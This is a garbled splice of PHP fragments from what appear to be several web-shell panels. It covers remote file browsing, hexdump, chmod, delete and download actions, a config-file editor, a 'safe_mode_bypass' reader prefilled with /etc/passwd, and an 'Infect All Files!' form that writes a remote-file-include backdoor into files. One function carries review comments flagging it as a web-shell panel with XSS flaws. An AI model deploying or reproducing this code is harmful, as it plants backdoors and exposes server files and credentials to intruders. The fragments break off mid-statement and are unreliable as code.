echo " <a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&d=" . urlencode($d) . "\"><b><u>" . $t[0] . "</u></b></a>"; } else { echo " <a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&d=" . urlencode($d) . "\"><b>" . $t[0] . "</b></a>"; } echo " (<a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&white=1&d=" . urlencode($d) . "\" target=\"_blank\">+</a>) |"; } echo "<hr size=\"1\" noshade>"; if ($ft == "info") { echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> " . $d . $f . "</td></tr><tr><td><b>Size</b></td><td> " . view_size(filesize($d . $f)) . "</td></tr><tr><td><b>MD5</b></td><td> " . md5_file($d . $f) . "</td></tr>"; if (!$win) { echo "<tr><td><b>Owner/Group</b></td><td> "; $ow = posix_getpwuid(fileowner($d . $f)); $gr = posix_getgrgid(filegroup($d . $f)); echo ($ow["name"] ? $ow["name"] : fileowner($d . $f)) . "/" . ($gr["name"] ? $gr["name"] : filegroup($d . $f)); } echo "<tr><td><b>Perms</b></td><td><a href=\"" . $surl . "act=chmod&f=" . urlencode($f) . "&d=" . urlencode($d) . "\">" . view_perms_color($d . $f) . "</a></td></tr><tr><td><b>Create time</b></td><td> " . date("d/m/Y H:i:s", filectime($d . $f)) . "</td></tr><tr><td><b>Access time</b></td><td> " . date("d/m/Y H:i:s", fileatime($d . $f)) . "</td></tr><tr><td><b>MODIFY time</b></td><td> " . date("d/m/Y H:i:s", filemtime($d . $f)) . "</td></tr></table><br>"; $fi = fopen($d . $f, "rb"); if ($fi) { if ($fullhexdump) { echo "<b>FULL HEXDUMP</b>"; $str = fread($fi, filesize($d . $f)); } else { echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi, $hexdump_lines * $hexdump_rows); } $n = 0; $a0 = "00000000<br>"; $a1 = ""; $a2 = ""; for ($i = 0; $i < strlen($str); $i++) { $a1 .= sprintf("%02X", ord($str[$i])) . " ";
if (!is_readable(FILECONFIG) or is_dir(FILECONFIG) || !is_readable(FILEACCOUNT) or is_dir(FILEACCOUNT)) { foreach ($settingfile as $file) { if (file_exists($file)) { $buffer_TEXT .= "<b>Permision denied (" . htmlspecialchars($file) . ")!</b>"; } else { $buffer_TEXT .= '<b>' . $file . ' does not exists.</b><br />'; } } unset($file); } else { $close_config_page = false; $styledisplay = ' style="display:none;"'; $showpostn = false; $iserr = false; foreach ($settingfile as $file) { $buffer_TEXT .= "<b>File: " . basename($file) . " (" . view_size(filesize($file)) . ") attrib: " . view_perms_color($file) . "</b><br />"; } unset($file); $buffer_TEXT .= "You're logged with IP: <b class='g'>" . $visitors->userip . "</b><br /><hr width='800%' />"; if (isset($_POST['submit']) && $_POST['setupsave'] == 1) { #============= WRITE CONFIG ================ # Final filter to write config # Filter level 2; check strict value; raise error if value not valid if ($task == 'editor') { $edt = $_POST['edit_text']; $sfile = $_POST['file']; if (!write_file($sfile, $edt, 1)) { $buffer_TEXT .= "<b class='a'>Can't write to file!</b>"; } else { $buffer_TEXT .= "<b style='color:#00FF33'>Saved!</b>"; // $r = $edt;
/**
 * Print an HTML table listing the contents of a directory, with per-entry action links.
 *
 * The function changes the process working directory to $dir (or keeps the current one
 * when $dir is empty), reads every entry, and echoes one table row per entry. Each row
 * carries inline onclick handlers that fill in fields of forms named `reqs` and `editor`
 * and submit them; those forms are not created here and must exist elsewhere on the page.
 *
 * Helpers view_size(), dirsize(), owner() and view_perms_color() are defined outside this block.
 *
 * NOTE(review): nothing in this function authenticates the caller or restricts $dir to a
 * base directory. The action set it wires up (viewer, deletedir, delete, chmod, touch,
 * download, edit on arbitrary absolute paths) is what a web file manager / web-shell panel
 * exposes, so treat its presence on a server as something to investigate.
 *
 * NOTE(review): $_SERVER['PHP_SELF'], $dir and every file name are concatenated into HTML
 * attributes and inline JavaScript without htmlspecialchars() or JS escaping. A name that
 * contains quotes or markup will break out of the attribute or the script string.
 *
 * @param string $dir Directory to list; an empty value means the current working directory.
 * @return void Output is written directly with echo.
 */
function scandire($dir) {
    if (empty($dir)) {
        $dir = getcwd();
    }
    // `or` binds more loosely than `=`, so $dir receives chdir()'s boolean and die() only
    // runs when that is false. $pageend is neither a parameter nor declared global here,
    // so it is undefined inside this function.
    $dir = chdir($dir) or die('<font color="red">cannot chdir!</font> open_basedir/safe_mode on?<br><br>' . $pageend . '');
    // Re-read the directory from the process state and normalise to forward slashes
    // with a trailing "/".
    $dir = getcwd() . "/";
    $dir = str_replace("\\", "/", $dir);
    if (is_dir($dir)) {
        if ($dh = opendir($dir)) {
            // Sort entries into two lists by filetype(): directories, and file/link/socket.
            // Other types (and an empty filetype() result) are dropped. There is no filter
            // for "." and "..", so they will presumably land in $dire.
            while (($file = readdir($dh)) !== false) {
                if (filetype($dir . $file) == "dir") {
                    $dire[] = $file;
                }
                if (filetype($dir . $file) == "file" || filetype($dir . $file) == "link" || filetype($dir . $file) == "socket") {
                    $files[] = $file;
                }
                // Disabled debug code kept from the original:
                // if(filetype($dir.$file)=="") $files[]=$file; //debug: strange behavior of filetype() with openbasedir, it returns ""
                // if(filetype($dir.$file)=="link") $files[]=$file;
                // echo "file = ".$file." (".filetype($file).")<br>"; #debug
                // if (is_link($file)) { echo " -> ".readlink($file); }; #debug
            }
            closedir($dh);
            // $dire and $files are never initialised; @ hides the resulting warning when a
            // list stayed empty. NOTE(review): on PHP 8 sort()/count() on an unset variable
            // presumably raises a TypeError that @ does not suppress; confirm.
            @sort($dire);
            @sort($files);
            echo "<table border>";
            // "Go to dir" form: posts p=f, action=viewer and the typed directory back to this script.
            echo '<tr><td><form method="post" action="' . $_SERVER['PHP_SELF'] . '"><input name="p" type="hidden" value="f">go to dir:<input type="text" name="dir" value="' . $dir . '" size="30"><input name="action" type="hidden" value="viewer"><input type="submit" value="Go"></form></td></tr>';
            echo "<tr><td>Name</td><td>Type</td><td>Size</td><td>Inode Changed<br>File Modified<br>File Accessed</td><td>Owner<br>Group</td><td>Chmod</td><td>Action</td></tr>";
            // Directory rows: the name link opens the directory (action=viewer); the action
            // column offers deletedir, chmod and touch through the `reqs` form.
            for ($i = 0; $i < count($dire); $i++) {
                $link = $dir . $dire[$i];
                // The name link is closed with "<a/>" instead of "</a>" (markup defect in the original).
                // The permission cell shows the last four octal digits of fileperms().
                echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\'' . $link . '\'; document.reqs.submit();">' . $dire[$i] . '<a/></td><td>Dir</td><td>' . view_size(dirsize($link)) . '</td><td><font size="-1">' . date("d/m/Y H:i:s", filectime($link)) . '<br>' . date("d/m/Y H:i:s", filemtime($link)) . '<br>' . date("d/m/Y H:i:s", fileatime($link)) . '</font></td><td>' . owner($link) . '</td><td>' . substr(sprintf('%o', fileperms($link)), -4) . ' <br>(' . view_perms_color($link, "string") . ')</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.dir.value=\'' . $dir . '\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Delete">x</a> <a href="#" onclick="document.reqs.action.value=\'chmod\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Chmod">C</a> <a href="#" onclick="document.reqs.action.value=\'touch\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Touch">T</a></td></tr>';
            }
            // File rows: the name link and "E" submit the `editor` form (fields filee/files);
            // download, delete, chmod and touch go through the `reqs` form.
            for ($i = 0; $i < count($files); $i++) {
                $linkfile = $dir . $files[$i];
                echo '<tr><td><a href="#" onclick="document.editor.filee.value=\'' . $linkfile . '\'; document.editor.files.value=\'' . $linkfile . '\'; document.editor.submit();">' . $files[$i] . '</a>';
                // The row ends with a duplicated "</tr>" (markup defect in the original).
                echo '<br></td><td>File</td><td>' . view_size(filesize($linkfile)) . '</td><td><font size="-1">' . date("d/m/Y H:i:s", filectime($linkfile)) . '<br>' . date("d/m/Y H:i:s", filemtime($linkfile)) . '<br>' . date("d/m/Y H:i:s", fileatime($linkfile)) . '</font></td><td>' . owner($linkfile) . '</td><td>' . substr(sprintf('%o', fileperms($linkfile)), -4) . ' <br>(' . view_perms_color($linkfile, "string") . ')</td><td> <a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\'' . $linkfile . '\'; document.reqs.submit();" title="Download">D</a> <a href="#" onclick="document.editor.filee.value=\'' . $linkfile . '\'; document.editor.files.value=\'' . $linkfile . '\'; document.editor.submit();" title="Edit">E</a> <a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Delete">x</a> <a href="#" onclick="document.reqs.action.value=\'chmod\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Chmod">C</a> <a href="#" onclick="document.reqs.action.value=\'touch\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Touch">T</a></td></tr></tr>';
            }
            echo "</table>";
        }
    }
}
echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='" . urlencode($f) . "';document.todo.ft.value='" . $t[1] . "';document.todo.d.value='" . urlencode($d) . "';document.todo.submit();\"><b><u>" . $t[0] . "</u></b></a>"; } else { echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='" . urlencode($f) . "';document.todo.ft.value='" . $t[1] . "';document.todo.d.value='" . urlencode($d) . "';document.todo.submit();\"><b>" . $t[0] . "</b></a>"; } echo " |"; } echo "<hr size=\"1\" noshade>"; if ($ft == "info") { echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> " . $d . $f . "</td></tr><tr><td><b>Size</b></td><td> " . view_size(filesize($d . $f)) . "</td></tr><tr><td><b>MD5</b></td><td> " . md5_file($d . $f) . "</td></tr>"; if (!$win) { echo "<tr><td><b>Owner/Group</b></td><td> "; $ow = posix_getpwuid(fileowner($d . $f)); $gr = posix_getgrgid(filegroup($d . $f)); echo ($ow["name"] ? $ow["name"] : fileowner($d . $f)) . "/" . ($gr["name"] ? $gr["name"] : filegroup($d . $f)); } echo "<tr><td><b>Perms</b></td><td><a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.f.value='" . urlencode($f) . "';document.todo.d.value='" . urlencode($d) . "';document.todo.submit();\">" . view_perms_color($d . $f) . "</a></td></tr><tr><td><b>Create time</b></td><td> " . date("d/m/Y H:i:s", filectime($d . $f)) . "</td></tr><tr><td><b>Access time</b></td><td> " . date("d/m/Y H:i:s", fileatime($d . $f)) . "</td></tr><tr><td><b>MODIFY time</b></td><td> " . date("d/m/Y H:i:s", filemtime($d . $f)) . "</td></tr></table><br>"; $fi = fopen($d . $f, "rb"); if ($fi) { if ($fullhexdump) { echo "<b>FULL HEXDUMP</b>"; $str = fread($fi, filesize($d . $f)); } else { echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi, $hexdump_lines * $hexdump_rows); } $n = 0; $a0 = "00000000<br>"; $a1 = ""; $a2 = ""; for ($i = 0; $i < strlen($str); $i++) { $a1 .= sprintf("%02X", ord($str[$i])) . " ";
print "<form method='post' action='" . $patch . "?action=infect_all_file'>\n" . "<textarea name='cod3inf' cols=50 rows=4>\n" . "<?php include(\$GET['0xShell_RFI']); ?>\n" . "</textarea>\n" . "<br /><input type='submit' value='Infect All Files!' name='inf3ct'><br />\n"; } break; case 'safe_mode_bypass': print "<form action='" . $patch . "?action=safe_mode_bypass' method='POST'>\n" . "File Name: <input type='text' name='filew' value='/etc/passwd'><br />\n" . "<input type='submit' value='Read File' name='red_file'>\n" . "</form>\n"; if (isset($_POST['red_file'])) { if (empty($_POST['filew'])) { die("[ERROR] Enter the name file."); } else { safe_mode_bypass($_POST['filew']); } } break; case 'chmod': $perms = parse_perms(fileperms($_GET['file'])); print "<form action=\"" . $patch . "?action=chmod&file=" . htmlspecialchars($_GET['file']) . "\" method=\"POST\">\n\t\t\t\t<h3 align=\"center\">Chmod File: <i>" . htmlspecialchars($_GET['file']) . " - (" . view_perms_color($_GET['file']) . ")</i></h3><br />\n\t\t\t\t<table align=center width=300 border=0 cellspacing=0 cellpadding=5>\n\t\t\t\t<tr><td><b>Owner</b><br><br>\n\t\t\t\t <input type=checkbox NAME='chmod_o_r' value=1" . ($perms["o"]["r"] ? " checked" : "") . ">Read\n\t\t\t\t<br><input type=checkbox name='chmod_o_w' value=1" . ($perms["o"]["w"] ? " checked" : "") . ">Write\n\t\t\t\t<br><input type=checkbox NAME='chmod_o_x' value=1" . ($perms["o"]["x"] ? " checked" : "") . ">eXecute</td>\n\t\t\t\t<td><b>Group</b><br><br>\t\t\t\t\n\t\t\t\t <input type=checkbox NAME='chmod_g_r' value=1" . ($perms["g"]["r"] ? " checked" : "") . ">Read\n\t\t\t\t<br><input type=checkbox NAME='chmod_g_w' value=1" . ($perms["g"]["w"] ? " checked" : "") . ">Write\n\t\t\t\t<br><input type=checkbox NAME='chmod_g_x' value=1" . ($perms["g"]["x"] ? " checked" : "") . ">eXecute\n\t\t\t\t</font></td>\t\t\t\t\n\t\t\t\t<td><b>World</b><br><br>\n\t\t\t\t <input type=checkbox NAME='chmod_w_r' value=1" . ($perms["w"]["r"] ? " checked" : "") . 
">Read\n\t\t\t\t<br><input type=checkbox NAME='chmod_w_w' value=1" . ($perms["w"]["w"] ? " checked" : "") . ">Write\n\t\t\t\t<br><input type=checkbox NAME='chmod_w_x' value=1" . ($perms["w"]["x"] ? " checked" : "") . ">eXecute\n\t\t\t\t</font></td></tr><tr><td>\n\t\t\t\t<input type='submit' name='chmod_edit' value='Save'>\n\t\t\t\t</td></tr>\n\t\t\t\t</table>\n\t\t\t\t</form>"; if (isset($_POST['chmod_edit'])) { $perms_final = "0" . base_convert((@$_POST['chmod_o_r'] ? 1 : 0) . (@$_POST['chmod_o_w'] ? 1 : 0) . (@$_POST['chmod_o_x'] ? 1 : 0) . (@$_POST['chmod_g_r'] ? 1 : 0) . (@$_POST['chmod_g_w'] ? 1 : 0) . (@$_POST['chmod_g_x'] ? 1 : 0) . (@$_POST['chmod_w_r'] ? 1 : 0) . (@$_POST['chmod_w_w'] ? 1 : 0) . (@$_POST['chmod_w_x'] ? 1 : 0), 2, 8); print chmod_shell($_GET['file'], $perms_final); } break; } if (isset($remove_file)) { //Rimozione file if (!is_writable($remove_file)) { die("File Not Deleted"); } if (unlink($remove_file)) { print "<script>alert('File Deleted'); location.href='" . $patch . "';</script>"; } else { print "<script>alert('File Not Deleted'); location.href='" . $patch . "';</script>";
} } // === MAIN $buffer_TEXT = ''; if (!is_readable($fileconfig) or is_dir($fileconfig)) { if (file_exists($fileconfig)) { $buffer_TEXT .= "<b>Permision denied (" . htmlspecialchars($fileconfig) . ")!</b>"; } else { $buffer_TEXT .= "<b>File does not exists.</b>"; } } else { $styledisplay = ' style="display:none"'; $showpostn = false; $iserr = false; $t_head = "<b>File: " . CONFIG_FILE . " (" . view_size(filesize($fileconfig)); $t_head .= ") attrib: " . view_perms_color($fileconfig) . "</b>"; $t_head .= "<br>You're logged with IP: <b class='g'>" . get_real_ip() . "</b><br><hr width=\"800\">"; $buffer_TEXT .= $t_head; if (isset($_GET["mode"])) { if ($_GET["mode"] == "editor") { $buffer_TEXT .= "<p><b><span id='nv1' style='background-color:#840000;color:yellow;'> Editor </span></p>"; } } if (isset($_POST['submit'])) { if ($task == 'editor') { $edt = $_POST["edit_text"]; $fp = fopen($fileconfig, "w"); if (!$fp) { $buffer_TEXT .= "<b class='a'>Can't write to file!</b>"; } else { fwrite($fp, $edt);